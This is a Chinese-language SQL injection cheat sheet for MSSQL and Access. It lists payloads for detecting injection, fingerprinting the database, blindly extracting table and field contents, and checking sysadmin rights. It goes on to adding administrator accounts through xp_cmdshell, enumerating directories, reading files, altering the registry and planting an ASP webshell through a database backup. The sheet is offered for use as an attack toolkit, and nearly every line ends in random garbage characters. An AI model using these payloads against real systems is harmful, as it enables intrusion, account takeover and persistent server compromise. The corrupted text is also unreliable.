1.判断是否有注入;and 1=1 ;and 1=2 q!W,2xqZoq
2.初步判断是否是mssql ;and user>0 p��S8��\�B
E�#P#{_BR^
3.注入参数是字符'and [查询条件] and ''=' .�J�-k^�+-
1V`-D�8-�?
4.搜索时没过滤参数的'and [查询条件] and '%25'=' "�>7xSWR*4
LHtO|U�tn(
5.判断数据库系统 ddL��3w�Q
�;X�+0,K3c
;and (select count(*) from sysobjects)>0 mssql �ubB�1a�_7
rZ,q�H��M�
;and (select count(*) from msysobjects)>0 access MZ%J
]�Nd
i�@�:^�b�_
-$!r+��4|q
�
��2l�,>x
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �P�:g�!~&Q
\:�h7,[e��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &</)k|.A6\
lfB�CzxifC
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `0ZH�=*��P
9L�7z<nt�n
9.(1)猜字段的ascii值(access) X(Af`�KOg[
6Zpa[,g�m�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "6]o�i*_8
G739�Ne[gL
(2)猜字段的ascii值(mssql) �UZ/�LR���
D�*@'%<?�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #re�R<qp&]
n$ByTmK�xv
10.测试权限结构(mssql) 12i`�82>;
k|�x�mZA*�
�Dz�hLb8k�
T}�\�>8EEG
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- !�l�dE9 .
~98q1HgS]D
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �:��&5u�)�
�BUZ7���4�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7r,�GdP��.
V@+���s�NM
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- j�A8Bmwt;w
H`<u2f�o|p
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 1�<h@�^s�;
/7B3�z}rd�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +Q��"s!�\5
�&K�!�0yR�
;and 1=(select IS_MEMBER('db_owner'));-- _�&�(Wz�0�
!�r�gXB(��
�zx)}�XOYf
�.z
�CkB86
11.添加mssql和系统的帐户 ;xq���;c\N
=l2 @'Y�Q
;exec master.dbo.sp_addlogin username;-- �W\I�l@Je;
;exec master.dbo.sp_password null,username,password;-- H�z�iQ%Q�R
B_#M�)d
O�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �`!N.1RP _
,��P�pVZq~
;exec master.dbo.xp_cmdshell 'net user username password �Y<��^�Or
mr[�1F�]G�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- V�B�^1w��m
4��T�uh]�5
;exec master.dbo.xp_cmdshell 'net user username password /add';-- k'.cl�^6Z8
'n{=`e(}cI
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- e�8�SAjl"}
Q�$Qr)mcC�
�:��V"�e+I
��hJFxT8B/
12.(1)遍历目录 c��9g��m�%
@� �#J2�t#
;create table dirs(paths varchar(100), id int) �DM6(8d�f(
c(Xm~
'jeH
;insert dirs exec master.dbo.xp_dirtree 'c:\' vzAY+EEx�
�1OY�
5�tq
;and (select top 1 paths from dirs)>0 ,*Wh{��)�
��m k��~F@
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 0I�)eYk�sh
�ko!]vHB9`
fZs}u<3�Q)
3-y2i/4}$�
(2)遍历目录 V
7 p{'C �
|p�/[s�D+M
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- $XyD��w|z[
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 %7[d5[U~ZA
{���o'(_.{
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "@+Z1k-8�U
�{JQV~rfh`
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 m,5m'9��dj
abV�Ei�[nP
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 QeQw����mI
4�,`t9�f^:
j0cB#M�44
FKtCUq��,:
13.mssql中的存储过程 q.hpnE~#lh
DBfq�9%J _
xp_regenumvalues 注册表根键, 子键 &4t=�Y`]SL
u<\Sf"��fs
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2��zsDb�'r
$*fEgU%� c
xp_regread 根键,子键,键值名 ?�YF��S�K
o�|KmKC n>
;exec xp_regread Fyz1LOH[�X
|N�tretz`\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �!':y�8(Ou
�P`��C�Q)o
xp_regwrite 根键,子键, 值名, 值类型, 值 �9$�s�x+=(
1b7��Q-elG
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 06af{FXsGb
lA�,[��&��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >U:.5Tch'V
/z1-4:^`A[
xp_regdeletevalue 根键,子键,值名 ���*�6(/5V
�nqY�ar�Hi
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �V[*��<^%�
~�c,+)69"T
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �ZB$,\|^�6
�UW�g�PQ%}
d��~C��Z9h
:Mu]*��N
14.mssql的backup创建webshell ['c*<f"
D2
7?Twh�s.O�
use model GKXd"�8z�]
w�x/*un%�2
create table cmd(str image); *]�S&V'�Di
B%co��`�0$
insert into cmd(str) values (''); r�+k~%5Ff~
�(Ixmg=C6y
backup database model to disk='c:\l.asp'; �,Igd��<A=
z��}$�!B.)
t;
�#D,g�x
?�D@WXE0a
15.mssql内置函数 p ^I#9�(PT
]1bN�cq2I
;and (select @@version)>0 获得Windows的版本号 ];{CNDAL2�
�K{G\=yJ((
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d?GB#�N|+g
covK�6�S�H
;and (select user_name())>0 爆当前系统的连接用户 �d�r=h;[Q'
?&XpwJw:~
;and (select db_name())>0 得到当前连接的数据库 8���}O�II\
>`�
|�sBx
3��5�#"]l"
w�2]��]##J
16.简洁的webshell Kb�#��Z(C9
^��,fMs�:�
use model �u3vw�[k�
`�Yo!sgPO\
create table cmd(str image); �hRk�tvO)K
�Tm�l>��>O
insert into cmd(str) values (''); hLS�a�s#B>
���G8���CM
backup database model to disk='g:\wwwtest\l.asp';
